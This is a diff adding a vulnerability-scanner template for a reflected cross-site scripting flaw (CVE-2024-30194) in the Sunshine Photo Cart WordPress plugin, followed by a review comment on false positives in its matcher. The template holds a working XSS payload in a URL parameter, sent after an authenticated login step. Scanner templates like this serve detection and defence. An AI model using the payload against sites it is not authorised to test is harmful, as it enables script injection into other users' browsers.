Merged
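--- a/http/cves/2024/CVE-2024-30194.yaml
+++ b/http/cves/2024/CVE-2024-30194.yaml
@@ -0,0 +1,60 @@
+id: CVE-2024-30194
+
+info:
+name: Sunshine Photo Cart <= 3.1.1 - Reflected Cross-Site Scripting
+author: 0xanis
+severity: medium
+description: |
+WP Sunshine Sunshine Photo Cart versions up to 3.1.1 contain a cross-site scripting caused by improper neutralization of input during web page generation, letting attackers execute malicious scripts in users' browsers, exploit requires attacker to craft malicious input.
+impact: |
+Attackers can execute malicious scripts in users' browsers, leading to session hijacking, defacement, or redirection.
+remediation: |
+Update to the latest version of Sunshine Photo Cart.
+reference:
+- https://wpscan.com/vulnerability/8fe6645b-c11d-4075-89c1-f6a01dfb3a0e/
+- https://patchstack.com/database/vulnerability/sunshine-photo-cart/wordpress-sunshine-photo-cart-plugin-3-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
+- https://nvd.nist.gov/vuln/detail/CVE-2024-30194
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.1
+cve-id: CVE-2024-30194
+cwe-id: CWE-79
+metadata:
+verified: true
+max-request: 2
+vendor: wpsunshine
+product: sunshine-photo-cart
+framework: wordpress
+tags: cve,cve2024,wordpress,wp-plugin,xss,sunshine-photo-cart,authenticated,kev
+
+flow: http(1) && http(2)
+
+http:
+- raw:
+- |
+POST /wp-login.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+Cookie: wordpress_test_cookie=WP+Cookie+check
+
+log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+matchers:
+- type: dsl
+dsl:
+- 'status_code == 302'
+- 'contains(tolower(all_headers), "wordpress_logged_in")'
+condition: and
+internal: true
+
+- raw:
+- |
+GET /wp-admin/edit.php?post_type=sunshine-gallery&page=sunshine-reports&report=orders%22%20onmouseover=alert(document.domain)%3Bthis.remove()%3B%20style=position:fixed%3Bleft:0%3Btop:0%3Bwidth:100vw%3Bheight:100vh%3B HTTP/1.1
+Host: {{Hostname}}
+
+matchers:
+- type: dsl
+dsl:
+- 'status_code == 200'
+- 'contains_all(body, "onmouseover=alert(document.domain);this.remove(); style=position:fixed;left:0;top:0;width:100vw;height:100vh;", "Sunshine Photo Cart")'
+condition: and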
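Review bot: The body matcher on the second request starts its needle at `onmouseover=` and leaves out the `"` that the request sends in front of it, so a match does not show that the quote came back unescaped. A fixed build that HTML-encodes the quote but echoes the rest of the value would presumably still match and be reported as vulnerable. Anchoring on the attribute breakout, for example a `word` matcher on `orders" onmouseover=alert(document.domain)`, and adding `'contains(content_type, "text/html")'` to the `dsl` list would cut those false positives. The `kev` tag and the "latest version" remediation should also be checked against the listed references, since nothing in the file backs the former and the latter names no fixed release.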